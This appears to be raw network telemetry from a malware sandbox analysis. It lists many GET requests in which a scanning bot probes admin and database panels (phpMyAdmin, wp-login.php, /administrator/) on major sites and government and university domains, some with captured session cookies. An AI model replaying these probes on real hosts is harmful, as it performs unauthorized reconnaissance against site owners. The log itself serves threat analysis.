                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: lookaside.fbsbx.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: yellosa.co.zaAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: analvids.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://accounts.google.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gitam.zoom.usAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=9aWbkbPT4DdlgG_jg44HMc41AE1.59S3JcFtxwJ.xgU-1707131766-1-AerVx9RXy0Zm7OnurxzYuId07SlHkitQXtOcQmpWK47Y6f+CHIBXVtzdIORdzJ1w/NBTDnTUsLHOaZpdNAQ/zfs=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: terna.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: app.plex.tvAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.0Host: signin.rockstargames.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: tiktok.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EB9E7C4220EA26B83E4ECBCC2AD807EE6A7F0E8DA15DAD94CF1D20A18BE263D17User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: hi-in.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EDDAF7B9110B0A46B575850AB86F0E3E0AEC9356593FDDBE1D721FD3E4C0BAB24User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: pt.secure.imvu.comAccept: */*Accept-Encoding: deflate, gzipCookie: osCsid=a1aabfac7a1f7e8705602ed881881037User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: us04web.zoom.usAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=1iAg.jaqOry6c7AW1l9FRRQzGRAhyUaJmOXCMdnuwVs-1707131767-1-AXN1T055F/0qPV5xho0c5Hp5aAPUnzpxyaVcvCdaYwqNFgvDA63Qh9s5qsoOO8s0XQO1pfqrAc0csWoMqMsU+Ok=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://us04web.zoom.us/wp-login.php
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.0Host: upsconline.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: zarkana2.roAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: bonga20120608=d4b62ea767f8c27a8f51fe1000153277; ts_type2=1; __cf_bm=sPKSaJvRUxAcg1PEcdR35O5GebQF9IpP_4Igj06Qn1U-1707131767-1-AfutacbLjRJXJ/HlVv4ccDZ2KwcLDrWfFrasoUlTJQoQXwrk+mYT9PLaGfsipxqCCZnwBC6f5dRn/AaHcx7pL3Q=; uh=IHSAIQqQLaWbpmumq0cKLxuvMUS0Hj==; fv=AmL3ZGZkAmN3ZD==User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: discord.comAccept: */*Accept-Encoding: deflate, gzipCookie: __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hi-in.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: mega.nzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://mega.nz/wp-login.php
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: sport.autoplay.cloudAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=YOyxb9aU78NaI96z2sr4QbRuq80T5iBgvIchIzUA8sc-1707131767-1-AeL6bfGfUZ6U/Ap1Ak+vwqFlIGc33k6j5+9DW+6potT7/e/iNxD6laTBd7Qn7PszDDObqSeT9QEqBj5vyiFCIYY=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: instructory.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: th-th.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: testconnect.garena.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.analvids.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: aeaaamorim.inovarmais.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: netizion.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: uh.isAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: warriorplus.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: m.codere.com.coAccept: */*Accept-Encoding: deflate, gzipCookie: incap_ses_1816_2786379=WqiPd+MpAh7vehA+arozGXfDwGUAAAAAf0zscGSg46veBuMVqud6tA==; visid_incap_2786379=5tag4wo4T1GfIO+elp7EN3fDwGUAAAAAQUIPAAAAAAB4BLkAhZmiG4QXdfRN9Zxs; nlbi_2786379=xtV/OHOIMD7ou0OAaJQkpgAAAAAeL0CQftwLs0ZTw13GYZzvUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: poligrafosecuador.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: zarkana2.roAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=KQdoXLmOQJcbKhseP.EtWw3LEkzLnC8sr1PsAAKoLRQ-1707131766-1-AcAdZDV71hWzvP/naP9SO7zlMUviMxenx2XZEG+PYPwmGnbNdLYV5lTQ80fTSr2r8GyBcPqDeaCsRfND4BxM5tI=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mw.redsa.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mojadovera.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: cloud.simplify3d.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mobilsam.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.phonandroid.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: mega.nzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mitextoescolar.mineduc.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: sport.autoplay.cloudAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=rFUJfVj1Ep.q_B9GVJgxzRAsmv8ckHLmwIsjPmWiRVg-1707131766-1-AY/3/Y1ibVQoZ02SpACliRC5KzwLKzUsJaFlR0Fp8h0OnCoU9JdfgWjzL8hsfJH31BsORQsD0Bm2yRzlPv66gM0=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.0Host: ssc.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: instructory.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: login2.innova.puglia.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: JSESSIONID=A41748C5FFBE0AA3717601AC030D7592; BbRouter=expires:1707142568,id:AA5B0F56EE09038D64C6A202F41CF905,signature:a5b7125ed6ba37cb61202ccfee1c2f3a72304b38c669361818b7f385ffa34717,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:16c6130f-60d2-4ae4-9489-4e6878a2dd45; AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EB9E7C4220EA26B83E4ECBCC2AD807EE6A7F0E8DA15DAD94CF1D20A18BE263D17User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://ucv.blackboard.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: bonga20120608=c698aa81d303b6657c01a45b96f05fa3; ts_type2=1; __cf_bm=KQdoXLmOQJcbKhseP.EtWw3LEkzLnC8sr1PsAAKoLRQ-1707131766-1-AcAdZDV71hWzvP/naP9SO7zlMUviMxenx2XZEG+PYPwmGnbNdLYV5lTQ80fTSr2r8GyBcPqDeaCsRfND4BxM5tI=; uh=GJAABKqyLmuAoJAgHyukJwOxoaSVDt==; fv=ZQp3ZGZkAmN3ZD==User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://pxndx-mcr.boletia.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: discord.comAccept: */*Accept-Encoding: deflate, gzipCookie: __sdcfduid=f7108151c41711eea0b60fe64c998bd492e66eddc076b200708bdc05ed2cbe73d6bf4f0f17b0d993defd8d35f71a55a6; __dcfduid=f7108150c41711eea0b60fe64c998bd4; __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://discord.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET /pma HTTP/1.1Host: cjdropshipping.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: th-th.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.0Host: oferta.senasofiaplus.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /academico/phpMyAdmin/ HTTP/1.1Host: academico.um.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sistemas.pa.gov.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.uh.isAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: eei.uniandes.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /en/phpmyadmin/ HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: bonga20120608=df106ebcbffc1861ca322b6f3f8633ab; ts_type2=1; __cf_bm=hYI9uaB5o1Z9vOPanp05auLoaQukIGLPJXDgF1LPBXk-1707131770-1-AV82M4ZN3NGdbY1RWqCn2CYbGXaWAtlSiuSCRk+M1uMz6ANcyYTABpz0ar3eNHcldxpImA+s0kWuevSh8Lkq75k=; uh=FyE6pTEiExAnn0c6AKy6A2cAoJquHD==; fv=ZQp3ZGZkAmN3ZD==User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /academico/login HTTP/1.1Host: academico.um.edu.mxAccept: */*Accept-Encoding: deflate, gzipCookie: JSESSIONID=8762699CA49BCC3318B1609C54D1F4A0User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: th-th.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: zarkana2.roAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: idp.uitgeverij-deviant.nlAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: hi-in.facebook.comAccept: */*Accept-Encoding: deflate, gzipCookie: datr=e8PAZQti-we2Cxw2VrrmnDbW; ps_n=0; ps_l=0User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://m.facebook.com/wp-login.php?locale=hi_IN&_rdr
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /en/wp-admin/ HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: pt.secure.imvu.comAccept: */*Accept-Encoding: deflate, gzipCookie: osCsid=75ead7575354d04015590554959bc526User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
